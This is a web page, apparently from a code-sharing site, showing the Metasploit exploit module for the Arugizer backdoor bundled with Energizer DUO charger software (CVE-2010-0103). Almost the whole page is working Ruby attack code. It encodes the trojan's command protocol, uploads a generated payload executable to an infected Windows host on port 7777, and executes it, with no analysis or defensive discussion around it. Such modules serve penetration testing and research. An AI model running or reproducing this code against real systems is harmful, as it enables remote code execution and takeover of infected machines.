扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 |
## # $Id: energizer_duo_payload.rb 10389 2010-09-20 04:38:13Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Energizer DUO Trojan Code Execution', 'Description'=> %q{ This module will execute an arbitrary payload against any system infected with the Arugizer trojan horse. This backdoor was shipped with the software package accompanying the Energizer Duo USB battery charger. }, 'Author' => [ 'hdm' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 10389 $', 'References' => [ ['CVE', '2010-0103'], ['OSVDB', '62782'], ['US-CERT-VU', '154421'] ], 'Platform' => 'win', 'Targets'=> [ [ 'Automatic', { } ], ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Mar 05 2010' )) register_options( [ Opt::RPORT(7777), ], self.class) end def trojan_encode(str) str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*") end def trojan_command(cmd) cid = "" case cmd when :exec cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}" when :dir cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}" when :write cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}" when :read cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}" when :nop cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}" when :find cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}" when :yes cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}" when :runonce cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}" when :delete cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}" end trojan_encode( [cid.length + 1].pack("V") + cid+ "\x00" ) end def exploit nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00" exe = generate_payload_exe + "\x00" print_status("Trying to upload #{nam}...") connect # Write file request sock.put(trojan_command(:write)) sock.put(trojan_encode([nam.length].pack("V"))) sock.put(trojan_encode(nam)) sock.put(trojan_encode([exe.length].pack("V"))) sock.put(trojan_encode(exe)) # Required to prevent the server from spinning a loop sock.put(trojan_command(:nop)) disconnect # # Execute the payload # print_status("Trying to execute #{nam}...") connect # Execute file request sock.put(trojan_command(:exec)) sock.put(trojan_encode([nam.length].pack("V"))) sock.put(trojan_encode(nam)) # Required to prevent the server from spinning a loop sock.put(trojan_command(:nop)) disconnect end end |
体验盒子
